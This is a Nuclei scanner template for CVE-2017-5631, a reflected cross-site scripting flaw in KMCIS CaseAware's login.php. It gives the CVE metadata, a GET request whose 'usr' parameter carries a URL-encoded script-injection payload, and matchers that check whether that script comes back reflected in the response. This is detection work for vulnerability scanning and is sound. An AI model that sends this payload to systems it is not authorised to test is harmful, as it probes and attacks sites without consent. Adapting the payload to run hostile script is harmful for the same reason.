nuclei-templates/cves/2017/CVE-2017-5631.yaml

41 lines
1.1 KiB
YAML

id: CVE-2017-5631
info:
name: KMCIS CaseAware - Cross-Site Scripting
author: edoardottt
severity: medium
description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
reference:
- https://www.openbugbounty.org/incidents/228262/
- https://www.exploit-db.com/exploits/42042/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
tags: edb,cve,cve2017,xss,caseaware
requests:
- method: GET
path:
- "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'></script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12